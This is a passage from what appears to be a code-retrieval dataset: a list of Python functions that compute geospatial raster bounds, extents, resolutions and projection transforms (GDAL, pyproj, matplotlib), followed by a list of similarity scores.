x is not None]\n return min(pnts), max(pnts)", "def pivot_grid_bound(param=None, extent=10.0):\n\n # No pivot set.\n if not hasattr(cdp, param):\n raise RelaxError(\"The pivot point has not been set, cannot determine the grid search bounds.\")\n\n # The value.\n val = getattr(cdp, param)\n\n # Return the bound.\n return val + extent", "def getBounds(self, srs=None):\n if srs not in self._bounds:\n gt = self._getGeoTransform()\n nativeSrs = self.getProj4String()\n if not nativeSrs:\n self._bounds[srs] = None\n return\n bounds = {\n 'll': {\n 'x': gt[0] + self.sourceSizeY * gt[2],\n 'y': gt[3] + self.sourceSizeY * gt[5],\n },\n 'ul': {\n 'x': gt[0],\n 'y': gt[3],\n },\n 'lr': {\n 'x': gt[0] + self.sourceSizeX * gt[1] + self.sourceSizeY * gt[2],\n 'y': gt[3] + self.sourceSizeX * gt[4] + self.sourceSizeY * gt[5],\n },\n 'ur': {\n 'x': gt[0] + self.sourceSizeX * gt[1],\n 'y': gt[3] + self.sourceSizeX * gt[4],\n },\n 'srs': nativeSrs,\n }\n # Make sure geographic coordinates do not exceed their limits\n if self._proj4Proj(nativeSrs).crs.is_geographic and srs:\n try:\n self._proj4Proj(srs)(0, 90, errcheck=True)\n yBound = 90.0\n except RuntimeError:\n yBound = 89.999999\n keys = ('ll', 'ul', 'lr', 'ur')\n for key in keys:\n bounds[key]['y'] = max(min(bounds[key]['y'], yBound), -yBound)\n while any(bounds[key]['x'] > 180 for key in keys):\n for key in keys:\n bounds[key]['x'] -= 360\n while any(bounds[key]['x'] < -180 for key in keys):\n for key in keys:\n bounds[key]['x'] += 360\n if any(bounds[key]['x'] >= 180 for key in keys):\n bounds['ul']['x'] = bounds['ll']['x'] = -180\n bounds['ur']['x'] = bounds['lr']['x'] = 180\n if srs and srs != nativeSrs:\n inProj = self._proj4Proj(nativeSrs)\n outProj = self._proj4Proj(srs)\n keys = ('ll', 'ul', 'lr', 'ur')\n pts = pyproj.Transformer.from_proj(inProj, outProj, always_xy=True).itransform([\n (bounds[key]['x'], bounds[key]['y']) for key in keys])\n for idx, pt in enumerate(pts):\n key = keys[idx]\n bounds[key]['x'] = pt[0]\n bounds[key]['y'] = pt[1]\n bounds['srs'] = srs.decode() if isinstance(srs, bytes) else srs\n bounds['xmin'] = min(bounds['ll']['x'], bounds['ul']['x'],\n bounds['lr']['x'], bounds['ur']['x'])\n bounds['xmax'] = max(bounds['ll']['x'], bounds['ul']['x'],\n bounds['lr']['x'], bounds['ur']['x'])\n bounds['ymin'] = min(bounds['ll']['y'], bounds['ul']['y'],\n bounds['lr']['y'], bounds['ur']['y'])\n bounds['ymax'] = max(bounds['ll']['y'], bounds['ul']['y'],\n bounds['lr']['y'], bounds['ur']['y'])\n self._bounds[srs] = bounds\n return self._bounds[srs]", "def get_resolution(ds):\n\n if 'x' in ds.coords and 'y' in ds.coords:\n x = ds.coords['x'].values\n y = ds.coords['y'].values\n resx = abs(x[-1] - x[0]) / (len(x) - 1)\n resy = abs(y[-1] - y[0]) / (len(y) - 1)\n return (resx, resy)\n else:\n transform = get_transform(ds)\n if transform is not None:\n return (abs(transform.a), abs(transform.e))\n elif 'res' in ds.attrs:\n return ds.attrs['res']\n\n return None", "def map_extent(input_raster):\n\n gdal.UseExceptions()\n raster = gdal.Open(input_raster)\n raster_geotransform = raster.GetGeoTransform()\n raster_extent = (raster_geotransform[0],\n raster_geotransform[0]\n + raster.RasterXSize * raster_geotransform[1],\n raster_geotransform[3]\n + raster.RasterYSize * raster_geotransform[5],\n raster_geotransform[3])\n\n return raster_extent", "def get_bounds(self):\n return self._geometry.bounds", "def transformed_bounds(self):\n b = []\n\n for dim in self.dimensions:\n if dim.transformed_size == 1:\n b.append(dim.transformed_bounds)\n else:\n 
b.extend(dim.transformed_bounds)\n\n return b", "def _get_inv_gt(self):\r\n # Geotransform the original map\r\n self.in_gt = self.in_ds.GetGeoTransform()\r\n # Create an inverse geotransform for the raster.\r\n # This converts real-world coordinates to pixel offsets.\r\n self.inv_gt = gdal.InvGeoTransform(self.in_gt)\r\n if gdal.VersionInfo()[0] == '1':\r\n if self.inv_gt[0] == 1:\r\n self.inv_gt = self.inv_gt[1]\r\n else:\r\n raise RuntimeError('Inverse geotransform failed')\r\n elif self.inv_gt is None:\r\n raise RuntimeError('Inverse geotransform failed')", "def extent(obj):\n return obj.get('startOffset', -1), obj.get('endOffset', -1)", "def extent(obj):\n return obj.get('startOffset', -1), obj.get('endOffset', -1)", "def get_bounds(self):\n\n northing=self.f.variables['y']\n easting=self.f.variables['x']\n\n lat1,lon1 = utm.to_latlon(np.min(easting),np.min(northing),11,northern=True)\n lat2,lon2 = utm.to_latlon(np.max(easting),np.max(northing),11,northern=True)\n\n return (lon1,lon2,lat1,lat2)", "def get_absolute_poses(self):\n if self.backend is not None:\n return self.backend.absolute_poses()\n return compute_absolute_poses(self.odometry.get_relative_poses())", "def bounds(self):\n return self.xmin, self.xmax, self.ymin, self.ymax", "def dataCellExtent(dataset):\n # Subtracting 1 from GetDimensions accounts for point-counts\n # vs cell-counts, while np.flip(...) switches the axis order:\n ext = tuple(np.flip(dataset.GetDimensions()) - 1)\n return ext", "def get_bounds(self, crs=\"default\"):\n\n if crs == \"default\":\n crs = podpac.settings[\"DEFAULT_CRS\"]\n\n bounds = {}\n for coords in self.find_coordinates():\n ct = coords.transform(crs)\n for dim, (lo, hi) in ct.bounds.items():\n if dim not in bounds:\n bounds[dim] = (lo, hi)\n else:\n bounds[dim] = (min(lo, bounds[dim][0]), max(hi, bounds[dim][1]))\n\n return bounds, crs", "def get_extents(self, p, x, y, z, w, h):\n x.value, y.value, z.value, w.value, h.value = self._get_extents(p, x.value, y.value, z.value, w.value, h.value)", "def projection(self):\n return self.dataset.GetProjection() if self.dataset else None", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corners())\n corners = np.concatenate(corners)[:, :2] / self._pixel_shape\n\n # Find extremes, add 1 px margin to allow for rounding errors\n min_xy = corners.min(axis=0).astype(int) - 1\n max_xy = corners.max(axis=0).astype(int) + 1\n\n size = max_xy - min_xy\n centre = -min_xy\n # Switch xy -> yx\n return tuple(size[::-1]), centre[::-1]", "def projection(self):\n return self._map_projection", "def projection(self):\n return self._map_projection", "def getExtentUnits(self):\n return _libsbml.Model_getExtentUnits(self)", "def get_height():\n return resize.transforms[1].size", "def _set_lim_and_transforms(self):\n # There are three important coordinate spaces going on here:\n #\n # 1. Data space: The space of the data itself\n #\n # 2. Axes space: The unit rectangle (0, 0) to (1, 1)\n # covering the entire plot area.\n #\n # 3. Display space: The coordinates of the resulting image,\n # often in pixels or dpi/inch.\n\n # This function makes heavy use of the Transform classes in\n # ``lib/matplotlib/transforms.py.`` For more information, see\n # the inline documentation there.\n\n # The goal of the first two transformations is to get from the\n # data space (in this case longitude and latitude) to axes\n # space. 
It is separated into a non-affine and affine part so\n # that the non-affine part does not have to be recomputed when\n # a simple affine change to the figure has been made (such as\n # resizing the window or changing the dpi).\n\n # 1) The core transformation from data space into\n # rectilinear space defined in the HammerTransform class.\n self.transProjection = IdentityTransform()\n # 2) The above has an output range that is not in the unit\n # rectangle, so scale and translate it so it fits correctly\n # within the axes. The peculiar calculations of xscale and\n # yscale are specific to a Aitoff-Hammer projection, so don't\n # worry about them too much.\n self.transAffine = Affine2D.from_values(\n 1., 0, 0.5, np.sqrt(3)/2., 0, 0)\n self.transAffinedep = Affine2D.from_values(\n 1., 0, -0.5, np.sqrt(3)/2., 0, 0)\n #self.transAffine = IdentityTransform()\n \n # 3) This is the transformation from axes space to display\n # space.\n self.transAxes = BboxTransformTo(self.bbox)\n\n # Now put these 3 transforms together -- from data all the way\n # to display coordinates. Using the '+' operator, these\n # transforms will be applied \"in order\". The transforms are\n # automatically simplified, if possible, by the underlying\n # transformation framework.\n self.transData = \\\n self.transProjection + \\\n self.transAffine + \\\n self.transAxes\n\n # The main data transformation is set up. Now deal with\n # gridlines and tick labels.\n\n # Longitude gridlines and ticklabels. The input to these\n # transforms are in display space in x and axes space in y.\n # Therefore, the input values will be in range (-xmin, 0),\n # (xmax, 1). The goal of these transforms is to go from that\n # space to display space. The tick labels will be offset 4\n # pixels from the equator.\n\n self._xaxis_pretransform = IdentityTransform()\n self._xaxis_transform = \\\n self._xaxis_pretransform + \\\n self.transData\n self._xaxis_text1_transform = \\\n Affine2D().scale(1.0, 0.0) + \\\n self.transData + \\\n Affine2D().translate(0.0, -20.0)\n self._xaxis_text2_transform = \\\n Affine2D().scale(1.0, 0.0) + \\\n self.transData + \\\n Affine2D().translate(0.0, -4.0)\n\n # Now set up the transforms for the latitude ticks. The input to\n # these transforms are in axes space in x and display space in\n # y. Therefore, the input values will be in range (0, -ymin),\n # (1, ymax). The goal of these transforms is to go from that\n # space to display space. 
The tick labels will be offset 4\n # pixels from the edge of the axes ellipse.\n\n self._yaxis_transform = self.transData\n yaxis_text_base = \\\n self.transProjection + \\\n (self.transAffine + \\\n self.transAxes)\n self._yaxis_text1_transform = \\\n yaxis_text_base + \\\n Affine2D().translate(-8.0, 0.0)\n self._yaxis_text2_transform = \\\n yaxis_text_base + \\\n Affine2D().translate(8.0, 0.0)", "def get_bounds(ds):\n\n trans = get_transform(ds)\n if trans is not None:\n if isinstance(ds, xr.Dataset):\n dims = ds.dims\n elif isinstance(ds, xr.DataArray):\n dims = dict(zip(ds.dims, ds.shape))\n nrows = dims['y']\n ncols = dims['x']\n corners = (np.array([0, 0, ncols-1, ncols-1]),\n np.array([0, nrows-1, 0, nrows-1]))\n corner_x, corner_y = trans * corners\n return BoundingBox(\n left=corner_x.min(),\n bottom=corner_y.min(),\n right=corner_x.max(),\n top=corner_y.max()\n )\n else:\n return BoundingBox(\n left=ds['x'].min(),\n bottom=ds['y'].min(),\n right=ds['x'].max(),\n top=ds['y'].max()\n )", "def get_geo_bounds(self, extent=None, data_sel=None):\n if self.science_product:\n res = self.__nc_geo_bounds(extent, data_sel)\n else:\n res = self.__h5_geo_bounds(extent, data_sel)\n data_sel, lon_bounds, lat_bounds = res\n\n res = {}\n _sz = lon_bounds.shape\n res['longitude'] = np.empty((_sz[0]+1, _sz[1]+1), dtype=np.float)\n res['longitude'][:-1, :-1] = lon_bounds[:, :, 0]\n res['longitude'][-1, :-1] = lon_bounds[-1, :, 1]\n res['longitude'][:-1, -1] = lon_bounds[:, -1, 1]\n res['longitude'][-1, -1] = lon_bounds[-1, -1, 2]\n\n res['latitude'] = np.empty((_sz[0]+1, _sz[1]+1), dtype=np.float)\n res['latitude'][:-1, :-1] = lat_bounds[:, :, 0]\n res['latitude'][-1, :-1] = lat_bounds[-1, :, 1]\n res['latitude'][:-1, -1] = lat_bounds[:, -1, 1]\n res['latitude'][-1, -1] = lat_bounds[-1, -1, 2]\n\n if extent is None:\n return res\n\n return data_sel, res", "def bottomLeftCorner(self):\n self._updateExtents()\n return (self._mMinX,self._mMaxY)", "def minor_extent(self) -> complex:\n return min((self.max() - self.null, self.null - self.min()))", "def get_transform(self, map_from='visual', map_to='render'):\n return self.transforms.get_transform(map_from, map_to)", "def coord_proj(self):\r\n return self._coord_proj", "def size(self):\n return self.__xmax, self.__ymax", "def width_height(bounds):\n try:\n geom = reproject_geometry(\n box(*bounds), src_crs=tile.crs, dst_crs=dst_pyramid.crs\n )\n if geom.is_empty: # Shapely>=2.0\n raise ValueError(\"geometry empty after reprojection\")\n l, b, r, t = geom.bounds\n except ValueError: # pragma: no cover\n raise TopologicalError(\"bounds cannot be translated into target CRS\")\n return r - l, t - b", "def domain_bounds(self):\n return self._xmin, self._xmax, self._ymin, self._ymax, self._zmin, self._zmax", "def bounds(self):\n \n return self.osmdb.bounds()", "def get_bounding_box(self):\n if len(self.polygons) == 0:\n return None\n return numpy.array(((min(pts[:, 0].min() for pts in self.polygons),\n min(pts[:, 1].min() for pts in self.polygons)),\n (max(pts[:, 0].max() for pts in self.polygons),\n max(pts[:, 1].max() for pts in self.polygons))))", "def get_bbox(self, obj):\n renderer = self.figure.canvas.get_renderer()\n transformer = self.figure.dpi_scale_trans.inverted()\n return obj.get_window_extent(renderer=renderer).transformed(transformer)", "def geo_transform(self):\n pass", "def get_object_bounds(self):\n if len(self._object_bounds) == 0:\n # Nothing plotted yet\n return -.01, .01, -.01, .01\n xmins, xmaxs, ymins, ymaxs = 
np.array(self._object_bounds).T\n xmax = max(xmaxs.max(), xmins.max())\n xmin = min(xmins.min(), xmaxs.min())\n ymax = max(ymaxs.max(), ymins.max())\n ymin = min(ymins.min(), ymaxs.min())\n return xmin, xmax, ymin, ymax", "def get_projection(self):\n return self.projection", "def get_bbox(self):\n dimsizes = self.get_full_dimensions('lon').values()\n slices = [slice(None, None, dimsizes[0] - 1),\n slice(None, None, dimsizes[1] - 1)]\n lon = self.read_values('lon', slices=slices)\n lat = self.read_values('lat', slices=slices)\n return (lon.min(), lat.min(), lon.max(), lat.max())", "def getCurrentTransformSelection():\n node = cmds.ls(sl=True)\n if node:\n node = node[0]\n if cmds.nodeType(node) == 'transform':\n xform = node\n return xform\n else:\n relatives = cmds.listRelatives(node, shapes=True, f=1)\n if relatives:\n for i in relatives:\n if cmds.nodeType(i) == \"transform\":\n xform = i\n return xform\n return None", "def GetTransform(*args, **kwargs):\n return _gdi_.GraphicsContext_GetTransform(*args, **kwargs)", "def extent(self, **kwargs) -> gpd.GeoDataFrame:\n return gpd.GeoDataFrame(\n geometry=[box(*self.footprint().total_bounds)],\n crs=self.crs(),\n )" ]
[ "0.6707964", "0.62306535", "0.61376554", "0.58643377", "0.58163196", "0.5813695", "0.5760055", "0.5748703", "0.57084984", "0.5700975", "0.56836563", "0.5661239", "0.5635688", "0.5632432", "0.56189066", "0.5601325", "0.55867517", "0.5552704", "0.5544527", "0.5532464", "0.5512576", "0.55049706", "0.5500104", "0.54963976", "0.543696", "0.5405108", "0.5398917", "0.5361915", "0.5324615", "0.5324042", "0.5311395", "0.53015083", "0.53008103", "0.525847", "0.5256349", "0.5168529", "0.51329", "0.5121131", "0.51191145", "0.50949913", "0.5094101", "0.5085745", "0.50824857", "0.50582695", "0.50466925", "0.5046534", "0.5015328", "0.49839884", "0.4968262", "0.49595347", "0.4958106", "0.49522194", "0.49258733", "0.4920959", "0.4880789", "0.48775324", "0.48737133", "0.48336482", "0.48261192", "0.47992152", "0.47977766", "0.47870633", "0.47668493", "0.47567892", "0.47476017", "0.4736752", "0.47305942", "0.47305942", "0.47125965", "0.4637063", "0.46341562", "0.46230805", "0.4607761", "0.46064207", "0.4593204", "0.4582184", "0.45808795", "0.45808795", "0.4580255", "0.45729274", "0.45721936", "0.45712063", "0.45556805", "0.45551962", "0.4549101", "0.45418063", "0.453897", "0.45109153", "0.4503543", "0.45027548", "0.44981578", "0.44780275", "0.44776282", "0.4464994", "0.44619098", "0.44449311", "0.44213164", "0.4418409", "0.44175324", "0.4414818" ]
0.75209373
0
Get the scaling ratios required to upsample an image to `resolution`. If `resolution` is None, then assume it will be upsampled to the native destination resolution; see Dataset.GetNativeResolution(). If `places` is not None, rounds the ratios to the specified number of decimal places.
def GetScalingRatios(self, resolution=None, places=None):
    if resolution is None:
        resolution = self.GetNativeResolution(transform=None)

    # Get the pixel dimensions in map units. There is no custom transform,
    # because it makes no sense to compute a pixel ratio for a
    # reprojection.
    spatial_ref = self.GetSpatialReference()
    dst_pixel_width, dst_pixel_height = spatial_ref.GetPixelDimensions(
        resolution=resolution
    )
    src_pixel_width, src_pixel_height = self.GetPixelDimensions()

    xscale = abs(src_pixel_width / dst_pixel_width)
    yscale = abs(src_pixel_height / dst_pixel_height)

    if places is not None:
        xscale = round(xscale, places)
        yscale = round(yscale, places)

    return XY(x=xscale, y=yscale)
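For orientation, a minimal standalone sketch of the ratio arithmetic above; the pixel sizes are made-up stand-ins for the GetPixelDimensions() calls, not values from the source.

# Illustrative stand-ins for the source/destination pixel sizes (map units per pixel).
src_pixel_width, src_pixel_height = 30.0, -30.0
dst_pixel_width, dst_pixel_height = 10.0, 10.0

xscale = abs(src_pixel_width / dst_pixel_width)    # 3.0
yscale = abs(src_pixel_height / dst_pixel_height)  # 3.0

places = 2
if places is not None:
    xscale, yscale = round(xscale, places), round(yscale, places)

print((xscale, yscale))  # (3.0, 3.0)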
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetWorldScalingRatios(self, resolution=None, places=None):\n if resolution is None:\n resolution = self.GetNativeResolution()\n\n spatial_ref = self.GetSpatialReference()\n world = spatial_ref.GetWorldExtents().dimensions\n src_pixel_sizes = XY(x=world.x / self.RasterXSize,\n y=world.y / self.RasterYSize)\n dst_pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution)\n\n xscale = abs(src_pixel_sizes.x / dst_pixel_sizes.x)\n\n # Make sure that yscale fits within the whole world\n yscale = min(xscale, abs(src_pixel_sizes.y / dst_pixel_sizes.y))\n\n if places is not None:\n xscale = round(xscale, places)\n yscale = round(yscale, places)\n\n return XY(x=xscale, y=yscale)", "def _compute_output_resolution(input_spatial_resolution, kernel_size, stride,\n total_padding):\n if (input_spatial_resolution is None) or (kernel_size is None) or (\n stride is None) or (total_padding is None):\n return None\n return int(\n math.ceil((\n input_spatial_resolution + total_padding - kernel_size + 1) / stride))", "def change_resolution(img):\n scale_factor = np.random.choice(list(range(0, 6, 2)))\n if scale_factor == 0:\n return img\n downsample = nn.AvgPool2d(scale_factor)\n upsample = nn.UpsamplingNearest2d(scale_factor=scale_factor)\n new_res_img = upsample(downsample(img.unsqueeze(dim=1))).squeeze()\n return new_res_img", "def raw_resolution(resolution, splitter=False):\n width, height = resolution\n if splitter:\n fwidth = (width + 15) & ~15\n else:\n fwidth = (width + 31) & ~31\n fheight = (height + 15) & ~15\n return fwidth, fheight", "def compute_resolution(zoom, size_px):\n # Calibration data:\n dist_in_um = 10\n dist_in_px = np.array([21.13, 19.62, 8.93])\n zooms = np.array([1.5, 3, 4.5])\n image_max_sizes = np.array([330, 610, 410])\n \n return np.mean((dist_in_um/dist_in_px) * (zoom/zooms) * (image_max_sizes/size_px))", "def UResolution(self, *args):\n return _Adaptor3d.Adaptor3d_Surface_UResolution(self, *args)", "def resolution_range(self) -> Optional[float]:\n return self._get_property(RESOLUTION_RANGE_PROP, float)", "def _get_scaling(root):\n dpi = root.winfo_fpixels(\"1i\")\n scaling = dpi / 72.0\n logger.debug(\"dpi: %s, scaling: %s'\", dpi, scaling)\n return scaling", "def downscale_resolution(self, downscale_resolution):\n\n self._downscale_resolution = downscale_resolution", "def getResolution(self):\n return self.resolution", "def effective_resolution(self) -> Tuple[int, int]:\n import numpy as np\n\n assert self.info.resolution, 'No base resolution specified'\n rot = (self.info.rotate or 0) * math.pi / 180\n sin = math.sin(rot)\n cos = math.cos(rot)\n scale = np.array([[self.info.scale_x or 1.0, self.info.scale_y or 1.0]])\n resolution = np.array([[self.info.resolution[0], self.info.resolution[1]]])\n rot_matrix = np.array([[sin, cos], [cos, sin]])\n resolution = (scale * abs(np.cross(rot_matrix, resolution)))[0]\n return int(round(resolution[0])), int(round(resolution[1]))", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz", "def getResolution(self):\n return self._lowLevelGetDeviceResolution()", "def extend_to_grid(self, resolution):\n return Bounds(\n min_value = math.floor(self.min/resolution)*resolution,\n max_value = math.ceil(self.max/resolution)*resolution\n )", "def round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n if not multiplier:\n return filters\n 
divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)", "def round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n if not multiplier:\n return filters\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)", "def round_filters(filters, global_params):\n multiplier = global_params.width_coefficient\n if not multiplier:\n return filters\n divisor = global_params.depth_divisor\n min_depth = global_params.min_depth\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def downScaleResolution(kv, factor=10):\n sub_img_name = kv[0]\n sub_image = kv[1]\n img_dimension = len(sub_image)\n big_image = sub_image\n Nbig = img_dimension\n Nsmall = Nbig//factor\n small_image = big_image.reshape([Nsmall, Nbig // Nsmall, Nsmall, Nbig // Nsmall]).mean(3).mean(1)\n return (sub_img_name,small_image)", "def _round_filters(self, filters):\n filters *= self.width_coefficient\n new_filters = max(\n self.depth_divisor,\n int(filters + self.depth_divisor / 2)\n // self.depth_divisor\n * self.depth_divisor,\n )\n # Make sure that round down does not go down by more than 10%.\n if new_filters < 0.9 * filters:\n new_filters += self.depth_divisor\n return int(new_filters)", "def _pixel_scale(self, width=None, height=None, scale=None):\n if numpy.count_nonzero([width is not None, height is not None, scale is not None]) > 1:\n raise ValueError(\"Specify only one of width, height, or scale.\")\n if width is not None:\n scale = width / self._width\n elif height is not None:\n scale = height / self._height\n elif scale is None:\n scale = 1.0\n return scale", "def resolution(self) -> int:\n return self.options.resolution", "def pixel_size_ratio(self):\n return 2**(self.levels[-1] - self.levels[0])", "def reduce_resolution(input_dir, output_dir, factor=2):\n # Get the images.\n downsample_ratio = 1.0 / args.factor\n tiles = glob.glob(os.path.join(args.input_dir, 'S_*/*.tif*'))\n tiles.sort()\n print('Number of Tiles: ', len(tiles))\n print('Downsample Ratio: ', downsample_ratio)\n\n # Downsample the images by the requested factor with OpenCV's resize().\n for t in tqdm(tiles):\n dirname = os.path.basename(os.path.dirname(t))\n filename = os.path.basename(t)\n os.makedirs(os.path.join(args.output_dir, dirname), exist_ok=True)\n f_out = os.path.join(args.output_dir, dirname, filename)\n im = cv2.imread(t, 0)\n im_down = cv2.resize(im, (0, 0), fx=downsample_ratio, fy=downsample_ratio)\n cv2.imwrite(f_out, im_down)", "def get_resolution(testdata):\n diffs = np.transpose([testdata[1:, 0], 
np.diff(testdata[:, 0])])\n resolutions = ud.safedivide(diffs[:, 0], diffs[:, 1])\n # popt, pcov = scipy.optimize.curve_fit(fit_line, diffs[:, 0], resolutions, maxfev=1000000)\n # fitLine = fit_line(diffs[:, 0], *popt)\n # fitMax = np.max(fitLine)\n # fitMin = np.min(fitLine)\n # diffs_new = diffs[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # resolutions_new = resolutions[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # popt2, pcov2 = scipy.optimize.curve_fit(fit_line, diffs_new[:, 0], resolutions_new, maxfev=1000000)\n # plt.figure()\n # plt.plot(diffs[:,0], resolutions)\n # plt.plot(diffs[:, 0], fit_line(diffs[:, 0], *popt2), 'r-')\n # plt.show()\n # Currently use A * m ^1.5 (0.5?)\n # Maybe use a*M^b\n # return popt2\n return np.median(resolutions)", "def scaling(self):\n return self.__scaling", "def _round_channels(channels, multiplier=1.0, divisor=8, channel_min=None):\n if not multiplier:\n return channels\n\n channels *= multiplier\n channel_min = channel_min or divisor\n new_channels = max(\n int(channels + divisor / 2) // divisor * divisor,\n channel_min)\n # Make sure that round down does not go down by more than 10%.\n if new_channels < 0.9 * channels:\n new_channels += divisor\n return new_channels", "def get_res_size_from_size(sz, factor):\n if (factor is None) :\n print('WARNING: Could not compute low_res_size as factor was ' + str( factor ))\n return sz\n else:\n lowResSize = np.array(sz)\n if not isinstance(factor, list):\n lowResSize[2::] = (np.ceil((np.array(sz[2:]) * factor))).astype('int16')\n else:\n lowResSize[2::] = (np.ceil((np.array(sz[2:]) * np.array(factor)))).astype('int16')\n\n if lowResSize[-1]%2!=0:\n lowResSize[-1]-=1\n print('\\n\\nWARNING: forcing last dimension to be even: fix properly in the Fourier transform later!\\n\\n')\n\n return lowResSize", "def upsample_nearest(input, size=None, scale_factor=None):\n return interpolate(input, size, scale_factor, 'nearest')", "def setResolution(self, resolution):\n assert(resolution > 1 and resolution <= 8192)\n self.resolution = resolution", "def scale(self):\n return self.scale_factor / CONSTANTS.AU", "def scaling(self):\n return self._scaling", "def scaling(self):\n return self._scaling", "def resolution(self) -> int:\n return self._resolution", "def upsample(self, method):\n from scipy.signal import resample\n from scipy.ndimage.interpolation import zoom\n #print \"mm: 100 x 100 x 131\"\n #print \"Dims:\", self.D.shape\n fact = np.array(self.info.shape).astype(\"float32\") / np.array(self.info.read_shape).astype(\"float32\")+0.00001 # hrmpf!!\n if method == \"zoom\":\n print \"Resampling...\"\n self.D = zoom(self.D, fact).astype(\"float32\")\n elif method == \"resample\":\n print \"Resampling...\"\n a = self.info.resample_ax\n s = self.info.shape[a]\n self.D = resample(self.D, s, axis=a, window=10).astype(\"float32\")\n elif method == None:\n pass\n else:\n raise NotImplementedError(\"Unknown upsampling method: %s\" % method)\n #print \"Dims:\", self.D.shape\n print \"done.\"", "def set_scale_factors_to_output_size(self):\n # Compute the scale_factor using rounded scaled image size.\n height = tf.shape(self._image)[0]\n width = tf.shape(self._image)[1]\n max_image_size = tf.to_float(tf.maximum(height, width))\n image_scale = tf.to_float(self._output_size) / max_image_size\n scaled_height = tf.to_int32(tf.to_float(height) * image_scale)\n scaled_width = tf.to_int32(tf.to_float(width) * image_scale)\n self._image_scale = image_scale\n self._scaled_height = scaled_height\n 
self._scaled_width = scaled_width", "def _set_resolution( self ):\r\n offset = 0\r\n # if current and skinned resolutions differ and skinned resolution is not\r\n # 1080i or 720p (they have no 4:3), calculate widescreen offset\r\n if ( ( not ( self.currentResolution == self.resolution ) ) and self.resolution > 1 ):\r\n # check if current resolution is 16x9\r\n if ( self.currentResolution == 0 or self.currentResolution % 2 ): iCur16x9 = 1\r\n else: iCur16x9 = 0\r\n # check if skinned resolution is 16x9\r\n if ( self.resolution % 2 ): i16x9 = 1\r\n else: i16x9 = 0\r\n # calculate widescreen offset\r\n offset = iCur16x9 - i16x9\r\n self.win.setCoordinateResolution( self.resolution + offset )", "def find_supported_scaling_factor(\n current_width: int, current_height: int, target_width: int, target_height: int\n) -> tuple[int, int] | None:\n for idx, supported_sf in enumerate(SUPPORTED_SCALING_FACTORS):\n ratio = supported_sf[0] / supported_sf[1]\n width_after_scale = current_width * ratio\n height_after_scale = current_height * ratio\n if width_after_scale == target_width and height_after_scale == target_height:\n return supported_sf\n if width_after_scale < target_width or height_after_scale < target_height:\n return None if idx == 0 else SUPPORTED_SCALING_FACTORS[idx - 1]\n\n # Giant image, the most we can reduce by is 1/8\n return SUPPORTED_SCALING_FACTORS[-1]", "def calculateRatio(levelDims):\n highestReso = np.asarray(levelDims[0])\n lowestReso = np.asarray(levelDims[-1])\n Xratio, Yratio = highestReso/lowestReso\n return (Xratio, Yratio)", "def set_rscale(self, top, bottom=0, round_up=False):\n if self.shape == 'circle':\n r = top\n elif self.shape == 'polygon':\n angle_of_slice = 2 * np.pi / self.size\n r = top / np.cos(angle_of_slice / 2.)\n if round_up:\n r = np.ceil(r)\n else:\n # this should never happen since this is checked for in class\n # creation\n raise ValueError('unknown value for `frame`: %s' % self.shape)\n self.set_ylim(bottom, r)", "def _get_rupture_dimensions(src, mag, nodal_plane):\n area = src.magnitude_scaling_relationship.get_median_area(\n mag, nodal_plane.rake)\n rup_length = math.sqrt(area * src.rupture_aspect_ratio)\n rup_width = area / rup_length\n seismogenic_layer_width = (src.lower_seismogenic_depth\n - src.upper_seismogenic_depth)\n max_width = (seismogenic_layer_width\n / math.sin(math.radians(nodal_plane.dip)))\n if rup_width > max_width:\n rup_width = max_width\n rup_length = area / rup_width\n return rup_length, rup_width", "def determine_real_to_pixel_ratio(\n image_shape: Tuple[int, int],\n min_x: float,\n min_y: float,\n max_x: float,\n max_y: float,\n):\n image_x = image_shape[1]\n image_y = image_shape[0]\n diff_x = max_x - min_x\n diff_y = max_y - min_y\n\n resolution_x = image_x / diff_x\n resolution_y = image_y / diff_y\n\n # Should be similar as cells are rectangles\n if not np.isclose(resolution_x, resolution_y):\n logging.info(\n f\"Resolution in x and y axes differ: x: {resolution_x} y: {resolution_y}\"\n )\n\n resolution = np.mean([resolution_x, resolution_y])\n\n return resolution", "def _infer_scale(\n print_h: Measurement, print_w: Measurement, viewbox_h: float, viewbox_w: float\n) -> float:\n if any(x < 0 for x in (print_h.value, print_w.value, viewbox_h, viewbox_w)):\n msg = \"Negative values are not allowed\"\n raise ValueError(msg)\n\n candidate_scales: set[float] = set()\n if print_w.value and viewbox_w:\n candidate_scales.add(print_w.value / viewbox_w)\n if print_h.value and viewbox_h:\n candidate_scales.add(print_h.value / 
